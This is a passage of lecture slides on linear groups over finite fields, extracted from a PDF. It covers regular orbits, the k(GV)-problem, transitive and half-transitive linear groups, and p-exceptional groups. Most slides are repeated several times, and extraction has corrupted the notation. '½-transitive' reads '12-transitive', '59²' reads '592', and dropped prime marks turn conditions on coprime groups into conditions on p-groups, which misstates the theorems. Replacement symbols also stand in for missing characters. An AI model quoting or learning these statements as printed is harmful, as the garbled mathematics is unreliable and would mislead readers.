>5)\n\nOrSL2(5)⊗(Cr.Cs)<GL2(q)⊗GLr(q)<GL2r(q) (r|s−1, r,s >5)\n\n(35)\n\n### Yet more on regular orbits\n\nRegular orbits ofG <GLn(q) crop up in several areas. A couple of examples:\n\n1. Supposeallorbits regular, ie. Gv = 1∀v ∈V\\0. Then affine groupH=VG ≤AGL(V) is a Frobenius group(Hvw = 1∀v,w) andG aFrobenius complement. Classified by Zassenhaus. Eg. SL2(5)<GL2(q) (char >5)\n\nOrSL2(5)⊗(Cr.Cs)<GL2(q)⊗GLr(q)<GL2r(q) (r|s−1, r,s >5)\n\n(36)\n\n### Yet more on regular orbits\n\nRegular orbits ofG <GLn(q) crop up in several areas. A couple of examples:\n\n1. Supposeallorbits regular, ie. Gv = 1∀v ∈V\\0. Then affine groupH=VG ≤AGL(V) is a Frobenius group(Hvw = 1∀v,w) andG aFrobenius complement. Classified by Zassenhaus.\n\nEg. SL2(5)<GL2(q) (char >5)\n\nOrSL2(5)⊗(Cr.Cs)<GL2(q)⊗GLr(q)<GL2r(q) (r|s−1, r,s >5)\n\n(37)\n\n### Yet more on regular orbits\n\nRegular orbits ofG <GLn(q) crop up in several areas. A couple of examples:\n\n1. Supposeallorbits regular, ie. Gv = 1∀v ∈V\\0. Then affine groupH=VG ≤AGL(V) is a Frobenius group(Hvw = 1∀v,w) andG aFrobenius complement. Classified by Zassenhaus.\n\nEg. SL2(5)<GL2(q) (char >5)\n\nOrSL2(5)⊗(Cr.Cs)<GL2(q)⊗GLr(q)<GL2r(q) (r|s−1, r,s >5)\n\n(38)\n\n### Yet more on regular orbits\n\nRegular orbits ofG <GLn(q) crop up in several areas. A couple of examples:\n\n1. Supposeallorbits regular, ie. Gv = 1∀v ∈V\\0. Then affine groupH=VG ≤AGL(V) is a Frobenius group(Hvw = 1∀v,w) andG aFrobenius complement. Classified by Zassenhaus.\n\nEg. SL2(5)<GL2(q) (char >5)\n\nOrSL2(5)⊗(Cr.Cs)<GL2(q)⊗GLr(q)<GL2r(q) (r|s−1, r,s >5)\n\n(39)\n\n### Yet more on regular orbits\n\n2. The k(GV)-problem This is\n\nConjecture Let G <GLn(p) =GL(V), G a p-group. The number of conjugacy classes k(VG) in the semidirect product VG satisfies\n\nk(VG)≤ |V|.\n\nEquivalent top-soluble case of Brauer’sk(B)-problem. Equality can hold, eg. G =�Singer−cycle� ∼=Cpn1\n\nRobinson-Thompson reduction: conjecture proved if we can show that forG of “simple type” or ”extraspecial type”, there exists a regular orbit ofG on V.\n\n“Simple type”: G has an irreducible normal subgroup H such that H/Z(H) is non-abelian simple.\n\n(40)\n\n### Yet more on regular orbits\n\n2. The k(GV)-problem This is\n\nConjecture Let G <GLn(p) =GL(V), G a p-group. The number of conjugacy classes k(VG) in the semidirect product VG satisfies\n\nk(VG)≤ |V|.\n\nEquivalent top-soluble case of Brauer’sk(B)-problem. Equality can hold, eg. G =�Singer−cycle� ∼=Cpn1\n\nRobinson-Thompson reduction: conjecture proved if we can show that forG of “simple type” or ”extraspecial type”, there exists a regular orbit ofG on V.\n\n“Simple type”: G has an irreducible normal subgroup H such that H/Z(H) is non-abelian simple.\n\n(41)\n\n### Yet more on regular orbits\n\n2. The k(GV)-problem This is\n\nConjecture Let G <GLn(p) =GL(V), G a p-group. The number of conjugacy classes k(VG) in the semidirect product VG satisfies\n\nk(VG)≤ |V|.\n\nEquivalent top-soluble case of Brauer’sk(B)-problem.\n\nEquality can hold, eg. G =�Singer−cycle� ∼=Cpn1\n\nRobinson-Thompson reduction: conjecture proved if we can show that forG of “simple type” or ”extraspecial type”, there exists a regular orbit ofG on V.\n\n“Simple type”: G has an irreducible normal subgroup H such that H/Z(H) is non-abelian simple.\n\n(42)\n\n### Yet more on regular orbits\n\n2. The k(GV)-problem This is\n\nConjecture Let G <GLn(p) =GL(V), G a p-group. The number of conjugacy classes k(VG) in the semidirect product VG satisfies\n\nk(VG)≤ |V|.\n\nEquivalent top-soluble case of Brauer’sk(B)-problem.\n\nEquality can hold, eg. G =�Singer−cycle� ∼=Cpn1\n\nRobinson-Thompson reduction: conjecture proved if we can show that forG of “simple type” or ”extraspecial type”, there exists a regular orbit ofG on V.\n\n“Simple type”: G has an irreducible normal subgroup H such that H/Z(H) is non-abelian simple.\n\n(43)\n\n### Yet more on regular orbits\n\n2. The k(GV)-problem This is\n\nConjecture Let G <GLn(p) =GL(V), G a p-group. The number of conjugacy classes k(VG) in the semidirect product VG satisfies\n\nk(VG)≤ |V|.\n\nEquivalent top-soluble case of Brauer’sk(B)-problem.\n\nEquality can hold, eg. G =�Singer−cycle� ∼=Cpn1\n\nRobinson-Thompson reduction: conjecture proved if we can show that forG of “simple type” or ”extraspecial type”, there exists a regular orbit ofG onV.\n\n“Simple type”: G has an irreducible normal subgroup H such that H/Z(H) is non-abelian simple.\n\n(44)\n\n### Yet more on regular orbits\n\n2. The k(GV)-problem This is\n\nConjecture Let G <GLn(p) =GL(V), G a p-group. The number of conjugacy classes k(VG) in the semidirect product VG satisfies\n\nk(VG)≤ |V|.\n\nEquivalent top-soluble case of Brauer’sk(B)-problem.\n\nEquality can hold, eg. G =�Singer−cycle� ∼=Cpn1\n\nRobinson-Thompson reduction: conjecture proved if we can show that forG of “simple type” or ”extraspecial type”, there exists a regular orbit ofG onV.\n\n“Simple type”: G has an irreducible normal subgroup H such that H/Z(H) is non-abelian simple.\n\n(45)\n\n### Last one on regular orbits\n\nTheorem (Hall-L-Seitz, Goodwin, Kohler-Pahlings, Riese) If G <GLn(p) is a p-group of simple type, then G has a regular orbit unless one of:\n\n(i) Ac�G <GLc1(p), p >c\n\n(ii) 23 exceptional cases, all with n≤10,p ≤61.\n\nEventuallyk(GV)-conjecture proved (Gluck, Magaard, Riese, Schmidt 2004)\n\nGeneral classification of linear groups with/without regular orbits is out of reach at the moment. Need substitutes...\n\n(46)\n\n### Last one on regular orbits\n\nTheorem (Hall-L-Seitz, Goodwin, Kohler-Pahlings, Riese) If G <GLn(p) is a p-group of simple type, then G has a regular orbit unless one of:\n\n(i) Ac�G <GLc1(p), p >c\n\n(ii) 23 exceptional cases, all with n≤10,p ≤61.\n\nEventuallyk(GV)-conjecture proved (Gluck, Magaard, Riese, Schmidt 2004)\n\nGeneral classification of linear groups with/without regular orbits is out of reach at the moment. Need substitutes...\n\n(47)\n\n### Last one on regular orbits\n\nTheorem (Hall-L-Seitz, Goodwin, Kohler-Pahlings, Riese) If G <GLn(p) is a p-group of simple type, then G has a regular orbit unless one of:\n\n(i) Ac�G <GLc1(p), p >c\n\n(ii) 23 exceptional cases, all with n≤10,p ≤61.\n\nEventuallyk(GV)-conjecture proved (Gluck, Magaard, Riese, Schmidt 2004)\n\nGeneral classification of linear groups with/without regular orbits is out of reach at the moment. Need substitutes...\n\n(48)\n\n### Last one on regular orbits\n\nTheorem (Hall-L-Seitz, Goodwin, Kohler-Pahlings, Riese) If G <GLn(p) is a p-group of simple type, then G has a regular orbit unless one of:\n\n(i) Ac�G <GLc1(p), p >c\n\n(ii) 23 exceptional cases, all with n≤10,p ≤61.\n\nEventuallyk(GV)-conjecture proved (Gluck, Magaard, Riese, Schmidt 2004)\n\nGeneral classification of linear groups with/without regular orbits is out of reach at the moment. Need substitutes...\n\n(49)\n\n### Few orbits\n\nLetG ≤GLn(q) =GL(V). There are results classifying groups G with few orbits onV\\0.\n\nOne orbit G transitive on V\\0. Equivalently, affine group VG ≤AGL(V) is 2-transitive.\n\nHering’s theorem Classification of transitive linear groups G ≤GLn(q):\n\n(i)G ≥SLn(q),Spn(q)\n\n(ii)G ≥G2(q) (n= 6, q even) (iii)G ≤ΓL1(qn)\n\n(iv)∼10 exceptions, all with |V| ≤592 (eg. F59◦SL2(5)<GL2(59)).\n\nTwo orbits ∃ similar classification (L) – hence the rank 3 affine permutation groups.\n\nThree, four,... orbits: can be done if desperate\n\n(50)\n\n### Few orbits\n\nLetG ≤GLn(q) =GL(V). There are results classifying groups G with few orbits onV\\0.\n\nOne orbit G transitive on V\\0. Equivalently, affine group VG ≤AGL(V) is 2-transitive.\n\nHering’s theorem Classification of transitive linear groups G ≤GLn(q):\n\n(i)G ≥SLn(q),Spn(q)\n\n(ii)G ≥G2(q) (n= 6, q even) (iii)G ≤ΓL1(qn)\n\n(iv)∼10 exceptions, all with |V| ≤592 (eg. F59◦SL2(5)<GL2(59)).\n\nTwo orbits ∃ similar classification (L) – hence the rank 3 affine permutation groups.\n\nThree, four,... orbits: can be done if desperate\n\n(51)\n\n### Few orbits\n\nLetG ≤GLn(q) =GL(V). There are results classifying groups G with few orbits onV\\0.\n\nOne orbit G transitive on V\\0. Equivalently, affine group VG ≤AGL(V) is 2-transitive.\n\nHering’s theorem Classification of transitive linear groups G ≤GLn(q):\n\n(i)G ≥SLn(q),Spn(q)\n\n(ii)G ≥G2(q) (n= 6, q even) (iii)G ≤ΓL1(qn)\n\n(iv)∼10 exceptions, all with |V| ≤592 (eg. F59◦SL2(5)<GL2(59)).\n\nTwo orbits ∃ similar classification (L) – hence the rank 3 affine permutation groups.\n\nThree, four,... orbits: can be done if desperate\n\n(52)\n\n### Few orbits\n\nLetG ≤GLn(q) =GL(V). There are results classifying groups G with few orbits onV\\0.\n\nOne orbit G transitive on V\\0. Equivalently, affine group VG ≤AGL(V) is 2-transitive.\n\nHering’s theorem Classification of transitive linear groups G ≤GLn(q):\n\n(i)G ≥SLn(q),Spn(q)\n\n(ii)G ≥G2(q) (n= 6, q even) (iii)G ≤ΓL1(qn)\n\n(iv)∼10 exceptions, all with |V| ≤592 (eg.\n\nF59◦SL2(5)<GL2(59)).\n\nTwo orbits ∃ similar classification (L) – hence the rank 3 affine permutation groups.\n\nThree, four,... orbits: can be done if desperate\n\n(53)\n\n### Few orbits\n\nLetG ≤GLn(q) =GL(V). There are results classifying groups G with few orbits onV\\0.\n\nOne orbit G transitive on V\\0. Equivalently, affine group VG ≤AGL(V) is 2-transitive.\n\nHering’s theorem Classification of transitive linear groups G ≤GLn(q):\n\n(i)G ≥SLn(q),Spn(q)\n\n(ii)G ≥G2(q) (n= 6, q even) (iii)G ≤ΓL1(qn)\n\n(iv)∼10 exceptions, all with |V| ≤592 (eg.\n\nF59◦SL2(5)<GL2(59)).\n\nTwo orbits ∃ similar classification (L) – hence the rank 3 affine permutation groups.\n\nThree, four,... orbits: can be done if desperate\n\n(54)\n\n### Few orbits\n\nLetG ≤GLn(q) =GL(V). There are results classifying groups G with few orbits onV\\0.\n\nOne orbit G transitive on V\\0. Equivalently, affine group VG ≤AGL(V) is 2-transitive.\n\nHering’s theorem Classification of transitive linear groups G ≤GLn(q):\n\n(i)G ≥SLn(q),Spn(q)\n\n(ii)G ≥G2(q) (n= 6, q even) (iii)G ≤ΓL1(qn)\n\n(iv)∼10 exceptions, all with |V| ≤592 (eg.\n\nF59◦SL2(5)<GL2(59)).\n\nTwo orbits ∃ similar classification (L) – hence the rank 3 affine permutation groups.\n\nThree, four,... orbits: can be done if desperate\n\n(55)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG onV\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a)G transitive\n\n(b)G ≤ �s�,s Singer cycle of order qn−1\n\n(c)G a Frobenius complement, eg. SL2(5)<GL2(q) (d)G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are: Frobenius complements, subgroups of ΓL1(qn), S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(56)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.)\n\nMany examples, eg. (a)G transitive\n\n(b)G ≤ �s�,s Singer cycle of order qn−1\n\n(c)G a Frobenius complement, eg. SL2(5)<GL2(q) (d)G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are: Frobenius complements, subgroups of ΓL1(qn), S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(57)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a)G transitive\n\n(b)G ≤ �s�,s Singer cycle of order qn−1\n\n(c)G a Frobenius complement, eg. SL2(5)<GL2(q) (d)G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are: Frobenius complements, subgroups of ΓL1(qn), S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(58)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a) G transitive\n\n(b)G ≤ �s�,s Singer cycle of order qn−1\n\n(c)G a Frobenius complement, eg. SL2(5)<GL2(q) (d)G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are: Frobenius complements, subgroups of ΓL1(qn), S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(59)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a) G transitive\n\n(b) G ≤ �s�,s Singer cycle of orderqn−1\n\n(c)G a Frobenius complement, eg. SL2(5)<GL2(q) (d)G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are: Frobenius complements, subgroups of ΓL1(qn), S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(60)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a) G transitive\n\n(b) G ≤ �s�,s Singer cycle of orderqn−1\n\n(c) G a Frobenius complement, eg. SL2(5)<GL2(q)\n\n(d)G =S(q)<GL2(q) (q odd), where S(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are: Frobenius complements, subgroups of ΓL1(qn), S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(61)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a) G transitive\n\n(b) G ≤ �s�,s Singer cycle of orderqn−1\n\n(c) G a Frobenius complement, eg. SL2(5)<GL2(q) (d) G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq}\n\nPassman 1969The soluble 12-transitive linear groups are: Frobenius complements, subgroups of ΓL1(qn), S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(62)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a) G transitive\n\n(b) G ≤ �s�,s Singer cycle of orderqn−1\n\n(c) G a Frobenius complement, eg. SL2(5)<GL2(q) (d) G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are:\n\nFrobenius complements, subgroups of ΓL1(qn),S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(63)\n\n### Arithmetic conditions on orbit sizes\n\nHalf-transitivity G ≤GLn(q) =GL(V) is 12-transitive if all orbits ofG on V\\0 have equal size. (Affine groupVG ≤AGL(V) is then\n\n3\n\n2-transitive.) Many examples, eg.\n\n(a) G transitive\n\n(b) G ≤ �s�,s Singer cycle of orderqn−1\n\n(c) G a Frobenius complement, eg. SL2(5)<GL2(q) (d) G =S(q)<GL2(q) (q odd), where\n\nS(q) ={\n\n� a 0 0 ±a1\n\n� ,\n\n� 0 a\n\n±a1 0\n\n:a∈Fq} Passman 1969The soluble 12-transitive linear groups are:\n\nFrobenius complements, subgroups of ΓL1(qn),S(q), and 6 exceptions withqn≤172.\n\nGeneral case....???\n\n(64)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p. Ties in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive,p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 and K ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(65)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive,p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 and K ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(66)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive,p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 and K ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(67)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV\n\n(b)G transitive,p| |G| ⇒G p-exceptional (c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 and K ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(68)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive, p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 and K ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(69)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive, p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 and K ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(70)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive, p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 andK ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(71)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive, p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 andK ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(72)\n\n### Arithmetic conditions\n\np-exceptional groups Say G ≤GLn(p) =GL(V) is p-exceptional ifp divides G and all orbits ofG onV have size coprime to p.\n\nTies in with previous notions:\n\n(a)G p-exceptional ⇒ G hasno regular orbit onV (b)G transitive, p| |G| ⇒G p-exceptional\n\n(c)G 12-transitive,p| |G| ⇒ G p-exceptional\n\n∃many examples, eg. V =Wk,G =H wrK where H≤GL(W) is transitive onW\\0 andK ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size. (Eg. K ap-group)\n\nCanp-exceptional linear groups be classified?\n\nYes, at least the irreducible ones ((Giudici, L, Praeger, Saxl, Tiep)...\n\n(73)\n\n### Arithmetic conditions\n\n(G ≤GLn(p) =GL(V) isp-exceptionalifp dividesG and all orbits ofG onV have size coprime to p.)\n\nTheorem Let G ≤GLd(p) =GL(V) be p-exceptional. Suppose G acts irreducibly and primitively on V . Then one of:\n\n(i) G transitive on V\\0 (ii) G ≤ΓL1(pn)\n\n(iii) G =Ac,Sc <GLc(2), c = 2r −1 or 2r −2,�= 1 or 2 (iv) G =SL2(5)<GL4(3), orbits1,40,40\n\nPSL2(11)<GL5(3), orbits1,22,110,110 M11<GL5(3), orbits1,22,220\n\nM23<GL11(2), orbits 1,23,253,1771\n\nAlso have a classification of the imprimitivep-exceptional groups: V =Wk,G ≤HwrK whereH≤GL(W) is transitive onW\\0 andK ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size.\n\n(74)\n\n### Arithmetic conditions\n\n(G ≤GLn(p) =GL(V) isp-exceptionalifp dividesG and all orbits ofG onV have size coprime to p.)\n\nTheorem Let G ≤GLd(p) =GL(V) be p-exceptional. Suppose G acts irreducibly and primitively on V . Then one of:\n\n(i) G transitive on V\\0 (ii) G ≤ΓL1(pn)\n\n(iii) G =Ac,Sc <GLc(2), c = 2r −1 or2r −2,�= 1 or 2 (iv) G =SL2(5)<GL4(3), orbits1,40,40\n\nPSL2(11)<GL5(3), orbits1,22,110,110 M11<GL5(3), orbits1,22,220\n\nM23<GL11(2), orbits 1,23,253,1771\n\nAlso have a classification of the imprimitivep-exceptional groups: V =Wk,G ≤HwrK whereH≤GL(W) is transitive onW\\0 andK ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size.\n\n(75)\n\n### Arithmetic conditions\n\n(G ≤GLn(p) =GL(V) isp-exceptionalifp dividesG and all orbits ofG onV have size coprime to p.)\n\nTheorem Let G ≤GLd(p) =GL(V) be p-exceptional. Suppose G acts irreducibly and primitively on V . Then one of:\n\n(i) G transitive on V\\0 (ii) G ≤ΓL1(pn)\n\n(iii) G =Ac,Sc <GLc(2), c = 2r −1 or2r −2,�= 1 or 2 (iv) G =SL2(5)<GL4(3), orbits1,40,40\n\nPSL2(11)<GL5(3), orbits1,22,110,110 M11<GL5(3), orbits1,22,220\n\nM23<GL11(2), orbits 1,23,253,1771\n\nAlso have a classification of the imprimitivep-exceptional groups:\n\nV =Wk,G ≤HwrK whereH≤GL(W) is transitive onW\\0 andK ≤Sk has all orbits on the power set of {1, . . . ,k}of p-size.\n\n(76)\n\n### Consequences\n\nRecallG 12-transitive ⇒all orbits on V\\0 have same size⇒ G is p-exceptional. Hence\n\nTheorem If G ≤GLd(p) is 12-transitive and p divides |G|, then one of:\n\n(i) G is transitive on V\\0 (ii) G ≤ΓL1(pd)\n\n(iii) G =SL2(5)<GL4(3), orbits1,40,40.\n\n(77)\n\n### Consequences\n\nRecallG 12-transitive ⇒all orbits on V\\0 have same size⇒ G is p-exceptional. Hence\n\nTheorem If G ≤GLd(p) is 12-transitive and p divides |G|, then one of:\n\n(i) G is transitive on V\\0 (ii) G ≤ΓL1(pd)\n\n(iii) G =SL2(5)<GL4(3), orbits1,40,40.\n\n(78)\n\n### Consequences\n\nRecallG 12-transitive ⇒all orbits on V\\0 have same size⇒ G is p-exceptional. Hence\n\nTheorem If G ≤GLd(p) is 12-transitive and p divides |G|, then one of:\n\n(i) G is transitive on V\\0 (ii) G ≤ΓL1(pd)\n\n(iii) G =SL2(5)<GL4(3), orbits1,40,40.\n\n(79)\n\n### Consequences\n\nGluck-Wolf theorem 1984 Let p be a prime and G a finite p-soluble group. Suppose N�G and N has an irreducible character φsuch thatχ(1)/φ(1) is coprime to p for allχ⊆φG. Then G/N has abelian Sylow p-subgroups.\n\nThis implies Brauer’sheight zeroconjecture forp-soluble groups. Using our classification ofp-exceptional groups, Tiep and Navarro have proved the Gluck-Wolf theorem for arbitrary finite groupsG. May lead to the complete solution of the height zero conjecture.\n\n(80)\n\n### Consequences\n\nGluck-Wolf theorem 1984 Let p be a prime and G a finite p-soluble group. Suppose N�G and N has an irreducible character φsuch thatχ(1)/φ(1) is coprime to p for allχ⊆φG. Then G/N has abelian Sylow p-subgroups.\n\nThis implies Brauer’sheight zeroconjecture forp-soluble groups. Using our classification ofp-exceptional groups, Tiep and Navarro have proved the Gluck-Wolf theorem for arbitrary finite groupsG. May lead to the complete solution of the height zero conjecture.\n\n(81)\n\n### Consequences\n\nGluck-Wolf theorem 1984 Let p be a prime and G a finite p-soluble group. Suppose N�G and N has an irreducible character φsuch thatχ(1)/φ(1) is coprime to p for allχ⊆φG. Then G/N has abelian Sylow p-subgroups.\n\nThis implies Brauer’sheight zeroconjecture forp-soluble groups.\n\nUsing our classification ofp-exceptional groups, Tiep and Navarro have proved the Gluck-Wolf theorem for arbitrary finite groupsG. May lead to the complete solution of the height zero conjecture.\n\n(82)\n\n### Consequences\n\nGluck-Wolf theorem 1984 Let p be a prime and G a finite p-soluble group. Suppose N�G and N has an irreducible character φsuch thatχ(1)/φ(1) is coprime to p for allχ⊆φG. Then G/N has abelian Sylow p-subgroups.\n\nThis implies Brauer’sheight zeroconjecture forp-soluble groups.\n\nUsing our classification ofp-exceptional groups, Tiep and Navarro have proved the Gluck-Wolf theorem for arbitrary finite groupsG. May lead to the complete solution of the height zero conjecture.\n\nReferences\n\nRelated documents\n\n155 H2a: The size of a terrorist group is limited by homophily and the political, economic, and social environment in which the group\n\ndisadvantage have special resonance for the Australian Aboriginal community, where the construct, the best interests of the child, has been applied and has resulted in an\n\nThe Swedish school authorities have drawn attention to this work and designated the school ‘the best school in Sweden working for equal value 2008’. Student empowerment, child’s\n\nOne may restrict attention to the groups that have a strictly finite presentation: a profinite (or pro-p) group G has this property if it has a finite presentation as a profinite\n\nfinite p-groups, character degrees, conjugacy class sizes, Kirillov orbit meth- ods, Lazard correspondence, relatively free p-groups.... In Theorem A we show that the class\n\nThe total ABC contribution to Australian screen drama, combined with approximately \\$125 million in external funding, delivered up to \\$244 million in production value to\n\nThis observation motivates the topic of the current paper, where we study regular maps whose automorphism groups have the property that all their Sylow subgroups contain a\n\nStudents further their understanding of rhythm, pitch, dynamics and expression, form and structure, timbre and texture in music; extend their understanding and use of aural\n\nIn this section, we determine bounds for the dimensions of faithful irreducible repre- sentations of almost quasisimple groups that admit no regular orbits.. Moreover, Lemma 3.1\n\nWe also obtain necessary conditions involving the rank of A and the exponent of its automorphism group, which allow us to construct large classes of abelian groups that fail to have\n\nSessional Com m ittee on the Environm ent 79.. A strong research and development effort, particularly into the integration of control methods, is 